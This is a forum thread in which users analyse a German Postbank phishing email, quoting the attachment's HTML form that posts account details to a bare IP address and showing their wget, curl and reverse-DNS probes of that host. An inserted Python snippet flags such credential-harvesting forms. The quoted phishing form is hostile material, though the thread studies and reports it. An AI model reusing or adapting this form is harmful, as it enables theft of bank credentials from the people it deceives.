First Bank Account html form bamboozlement

For discussions about security.
Karl Godt
Posts: 4199
Joined: Sun 20 Jun 2010, 13:52
Location: Kiel,Germany

First Bank Account html form bamboozlement

#1 Post by Karl Godt »

Today I managed for the first time to isolate a fraud.html attachment that the Firefox addon Simple Mail fetched from my remote inbox.

It is written in almost the worst German.

I get such fraud mails approx. once a week, with only one or two spelling or grammar errors
and an already dead link to somewhere:
http://coomar.milchs.org/KhaaPjMSgcRLYz ... IWFAc.html

and here is a (still valid) one:
http://babilon.arptoday.org/wWMrsTng/ym ... 2poVk.html


But this one has a tan.html attachment with the following lines:
[ .. ]

Code:

<div id="main"><div id="main-cn"><div id="nav"><div id="nav-cn">
<a href="#content" class="skip">Navigation überspringen</a>
<div id="nav-global" class="nav">
<h2 class="aux">Navigation</h2>
<ul><li class="ng-account-overview">
<a href="?wicket:bookmarkablePage=:de.postbank.ucp.application.rai.fs.kontenuebersicht.FinanzstatusPage" class="state-current">Kontenübersicht</a></li></ul></div></div></div>
    <form action="http://163.17.12.7/postdone.php" method="post" name="form" id="form">
      <div id="content">
        <div id="content-cn">
          <div id="div9">
            <div id="div" class="tpl-05">
              <div id="div2">
                <div id="div3">
                  <div id="div4">
                    <div id="div5">
                      <div id="div6">
                        <div id="content-bd">
                          <div class="tab-panel-bd">
                            <div id="id3d7">
                              <div class="form frm-western-union">
                                <div>
                                  <div class="frm-freigeben control-step" id="id45a">
                                    <div id="id460">
                                      <div class="form-ft ft-legitimacy">
                                        <fieldset>
                                          <div class="legend"><h3>Postbank Online-Banking - Willkommen</h3></div>
                                          <div class="legitimacy">
                                          <div class="legitimacy-cn">
                                            <div class="legitimacy-hd"></div>
                                            <div id="id464">
                                              <div class="inputBlock">
                                                <div id="id46d">

                                                  <div class="legitimacy-bd" id="id478">
                                                    <p><strong>Bitte lesen Sie sorgfältig und füllen Sie alle Schritte in Form aufgeführt, so können wir erfolgreich überprüfen Sie Ihr Profil.</strong></p>
                                                    <div class="field fld-text fld-mobile-tan" id="id479">
                                                      <div class="field-cn" id="id492">
                                                        <div class="field-bd"> <span class="field-group"> <span class="field-label">
                                                          <label for="mobile-tan"> <b>Kontonummer:</b> </label>
                                                          </span></span></div>

[ .. ]
                                    <wicket:container id="id46e" style="display:none"></wicket:container>
                                  </div>
                                </div>
                              </div></div></div></div></div></div></div></div></div></div></div></div></div></form>
wget http://163.17.12.7/postdone.php gave me these outputs:

Code:

bash-3.00# wget http://163.17.12.7/postdone.php
--16:41:26--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:28--  https://postbank.de/
           => `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
bash-3.00# wget --no-check-certificate http://163.17.12.7/postdone.php
--16:41:50--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--16:41:51--  https://postbank.de/
           => `index.html'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for postbank.de: unable to get local issuer certificate
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://www.postbank.de/ [following]
--16:41:53--  https://www.postbank.de/
           => `index.html'
Resolving www.postbank.de... 160.83.4.4
Connecting to www.postbank.de|160.83.4.4|:443... connected.
WARNING: Certificate verification error for www.postbank.de: unable to get local issuer certificate
WARNING: certificate common name `postbank.de' doesn't match requested host name `www.postbank.de'.
HTTP request sent, awaiting response... 200 OK
Length: 103,127 (101K) [text/html]

100%[====================================>] 103,127      170.98K/s             

16:41:54 (170.60 KB/s) - `index.html' saved [103127/103127]

bash-3.00# 
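A defender-side triage check for an attachment like the tan.html above, added here as an example and not code from the thread: it parses the HTML, collects every form action together with its input fields, and flags forms that post to a bare IP address, submit over plain HTTP, collect a password or PIN, or post to a host outside the bank's domain. The sample markup is constructed from the snippet in the post; the `<input>` fields are assumed, since the quoted attachment only shows the labels.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the tan.html attachment quoted above (not the
# full attachment): Postbank-branded markup whose form posts to a bare IP.
SAMPLE_HTML = """<html><body>
<h3>Postbank Online-Banking - Willkommen</h3>
<form action="http://163.17.12.7/postdone.php" method="post" name="form" id="form">
  <label for="kontonummer"><b>Kontonummer:</b></label><input type="text" name="kontonummer">
  <label for="pin"><b>PIN:</b></label><input type="password" name="pin">
</form></body></html>"""

class FormCollector(HTMLParser):
    """Collect each <form> action plus the (type, name) of its <input> fields."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append((a.get("type", "text"), a.get("name", "")))

def form_findings(html, expected_domain):
    """Return, per form, the reasons it looks like a credential-harvesting form."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        host = url.hostname or ""
        reasons = []
        try:
            ipaddress.ip_address(host)  # raises ValueError for a real hostname
            reasons.append("action host is a bare IP address")
        except ValueError:
            if host and host != expected_domain and not host.endswith("." + expected_domain):
                reasons.append("action host %s is not under %s" % (host, expected_domain))
        if url.scheme == "http":
            reasons.append("form submits over plain HTTP")
        if any(kind == "password" for kind, _ in form["inputs"]):
            reasons.append("form collects a password or PIN")
        findings.append({"action": form["action"], "reasons": reasons})
    return findings
```

Run against the sample, the single form is flagged on all three counts; a form posting to https://www.postbank.de/ would only be noted for collecting a PIN.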

L18L
Posts: 3479
Joined: Sat 19 Jun 2010, 18:56
Location: www.eussenheim.de/

Re: First Bank Account html form bamboozlement

#2 Post by L18L »

wget http://163.17.12.7/postdone.php gave me these outputs

Code:

# wget http://163.17.12.7/postdone.php 
--2014-01-30 20:02:52--  http://163.17.12.7/postdone.php
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://postbank.de [following]
--2014-01-30 20:02:53--  https://postbank.de/
Resolving postbank.de (postbank.de)... 160.83.4.4
Connecting to postbank.de (postbank.de)|160.83.4.4|:443... connected.
ERROR: cannot verify postbank.de's certificate, issued by `/C=US/O=VeriSign, Inc./OU=VeriSign Trust Network/OU=Terms of use at https://www.verisign.com/rpa (c)06/CN=VeriSign Class 3 Extended Validation SSL SGC CA':
  Unable to locally verify the issuer's authority.
To connect to postbank.de insecurely, use `--no-check-certificate'.
# 
Different, maybe because this was from Fatdog?


EDIT: wget version 1.13
Last edited by L18L on Fri 31 Jan 2014, 09:36, edited 1 time in total.

Karl Godt
Posts: 4199
Joined: Sun 20 Jun 2010, 13:52
Location: Kiel,Germany

#3 Post by Karl Godt »

bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters. Have had a YouTube session that reached my 5GB full-speed limit, now am throttled..


bash-3.00# host http://163.17.12.7
Host http://163.17.12.7 not found: 3(NXDOMAIN)

bash-3.00# host 163.17.12.7
7.12.17.163.in-addr.arpa domain name pointer E-7.iem.cyut.edu.tw.

And googling for E-7.iem.cyut.edu.tw:

Browse ftp://E-7.iem.cyut.edu.tw - FileMare.com
filemare.com/browse/E-7.iem.cyut.edu.tw
Browse ftp://E-7.iem.cyut.edu.tw: PORT1. ... ftp://E-7.iem.cyut.edu.tw. also known as ftp://163.17.12.7. » Asia » Taiwan » T'ai-pei » Taipei. affiliate marketing.


And
bash-3.00# wget ftp://163.17.12.7/postdone.php
--22:09:17-- ftp://163.17.12.7/postdone.php
=> `postdone.php'
Connecting to 163.17.12.7:21... failed: Connection timed out.
Retrying.

...

http://www.hcidata.info/host2ip.cgi
also says
Details of 163.17.12.7
IP Address : 163.17.12.7
Location : Taiwan (95% accuracy)
Host Name : E-7.iem.cyut.edu.tw
What the hell is there in Taiwan?


And wget now also further directs to

Code:

bash-3.00# wget http://163.17.12.7/postdone.php
--22:15:28--  http://163.17.12.7/postdone.php
           => `postdone.php'
Connecting to 163.17.12.7:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: https://postbank.de [following]
--22:15:31--  https://postbank.de/
           => `index.html.1'
Resolving postbank.de... 160.83.4.4
Connecting to postbank.de|160.83.4.4|:443... connected.
ERROR: Certificate verification error for postbank.de: unable to get local issuer certificate
To connect to postbank.de insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
AND curl seems at least to somehow download something:

Code:

bash-3.00# curl --post301 --post302 http://163.17.12.7/postdone.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>302 Found</TITLE> </HEAD><BODY><H1>Found</H1>The document has moved <A HREF="https://postbank.de">here</A>.<P><HR><ADDRESS>Apache/1.3.23 Server at localhost Port 80</ADDRESS></BODY></HTML>bash-3.00#

L18L
Posts: 3479
Joined: Sat 19 Jun 2010, 18:56
Location: www.eussenheim.de/

#4 Post by L18L »

Karl Godt wrote: bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters
You are right. I had overlooked that you had posted 2 commands (without and with --no-check-certificate).

The connection goes to Deutsche Bank's postbank via edu.tw.
....and edu.tw has one of your TANs (if your knowledge of the German language was as bad as the language used in that mail) :P

You could ask Deutsche Bank to not accept redirects from tw. :roll:

Karl Godt
Posts: 4199
Joined: Sun 20 Jun 2010, 13:52
Location: Kiel,Germany

#5 Post by Karl Godt »

L18L wrote:
Karl Godt wrote: bash-3.00# wget --version
GNU Wget 1.10.2
Don't think that it matters
You are right. I had overlooked that you had posted 2 commands (without and with --no-check-certificate).

The connection goes to Deutsche Bank's postbank via edu.tw.
....and edu.tw has one of your TANs (if your knowledge of the German language was as bad as the language used in that mail) :P

You could ask Deutsche Bank to not accept redirects from tw. :roll:
I have sent a mail about that to missbrauch @ post bank de and got a standard response that their folks would investigate.

Deutsche Bank is a private commercial bank that has nothing to do with the German federal reserve, the Deutsche Bundesbank - just the same as the Danish Den Danske Bank.

Post Bank is the bank branch of the formerly state-owned German Mail.
